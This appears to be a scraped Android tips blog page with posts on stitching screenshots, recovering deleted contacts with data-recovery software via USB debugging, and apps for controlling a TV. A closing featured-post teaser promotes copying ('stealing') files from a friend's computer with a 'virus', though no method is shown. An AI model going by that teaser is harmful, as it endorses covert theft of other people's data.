There is an application called "Stitch & Share: big screenshot" on Google Play store that lets you put more than one screen shot into one long Screenshot. All you have to do is download the application on your phone by clicking on it STITCH AND SHARE

20160522-191805.jpg

Then take several screenshots of any application or conversation you want manually, you just have to try to take the picture of the end of the first picture so you can bring them into this application to make a good and nice long screenshot.

The best thing about the application is that you can edit the images accurately in order to achieve the desired result, of course, you can save the image on your phone and share it with your friends.








Monday, 18 April 2016

How to Recover Deleted Contacts from Android

Android users feel depressed when all of their phone contacts have been erased or lost after wiping phone or buying a new one.

Is there any solution to restore all your lost contacts back??

YES , of course you can restore deleted contacts from your Android phone with "Android Data Recovery" , it allows you to recover deleted contacts directly from Android or SIM card on Android phones. Now let's go throught to Recover Deleted Contacts from Android....

picsart-04-19-10-35-22.jpg

## How to Recover Deleted Contacts from Android ??

1) At first download and install ANDROID DATA RECOVERY . Then, Open it.

2) Connect Android to Computer and Enable USB debugging.

=> Follow these steps if you don't know how to enable USB debugging <=

#For Android 4.2 or newer: Enter "Settings" > Click "About Phone" > Tap "Build number" for several times until getting a note "You are under developer mode" > Back to "Settings" >? Click "Developer options" > Check "USB debugging"

#For Android 3.0 to 4.1 : Enter "Settings" > Click "Developer options" > Check "USB debugging"

#For Android 2.3 or earlier : Enter "Settings" > Click "Applications" > Click "Development" > Check "USB debugging" ..

Now, USB debugging is enabled on your Android.

3) After opening Android Data Recovery Software, Android Data Recovery empowers you to seletively choose which type of files to be scanned. If you want to recover Android contacts only, you can tick "Contacts" because it takes less time to scan only contacts than scan all the data.

4) Now you will get message saying "Device Detected" , that means your Android has been detected by the program successfully. Here, you just need to click "Start " to analyze your Android device and wait for a few seconds.

When below window comes to you, you need to turn to your Android phone and click "Allow" popping up on the screen, until it disappear, and then back to the program and click "Start " to scan your Android for lost contacts.

5) After all contacts and messages have been scanned out, the program will remind you stop the scan, because it is a waste of time to scan all data. Then you can preview all contacts one by one in the scan result, mark those you want and click "Recover " to selectively save them on your computer.

6) Now, it's Done. You Recovered your all Lost Contacts.. !!!! Hurrayyyy !!!!

Note ::- Contacts found in the scan result contain those you deleted recently (displayed in orange) and those existing on your Android phone (displayed in black). You can separate them by using the button above: Only display deleted items.. And, if you want to save time, you can choose only scan the deleted Android files...

How To Control Your TV (Television) Using Your Android Device

Till now you use IR Remotes to command your Tv or other smart devices, but now technology is so developed that you can even use your smartphone as a Remote controller to control all your smart devices. So for this, we are here with our cool post How To Control Your TV Using Smartphone . The method is very simple and depends on some app specially designed for the smart device to control this device. So just read out the below to proceed.

By these apps you can control your IR electronic devices Remotely by just configuring with them through your smartphone. So proceed with these apps below. picsart-04-18-01-24-04.jpg

This method you can only control devices that have inbuilt wifi or Bluetooth feature in them which you ill use to pair with your smartphone to control them with below apps.

## Cool Apps To Control Your TV Using Your Android Device ##

#1GOOGLE TV REMOTE

#2 ANDROID TV REMOTE

#3 SMART TV REMOTE

#4 UNIVERSAL TV REMOTE

#5 SMART IR REMOTE

So, With these apps discussed above you will be able to control all the Wireless Connectivity enabled tech gadgets around you just with your smartphone. And this will make you fashionable in this computer world.

Featured post

How to copy (steal) files from a computer to a pendrive (Latest VIRUS)

Hello guys,have u ever want something from your friend pc,that he is not giving you like games,movies,important files etc. here icome...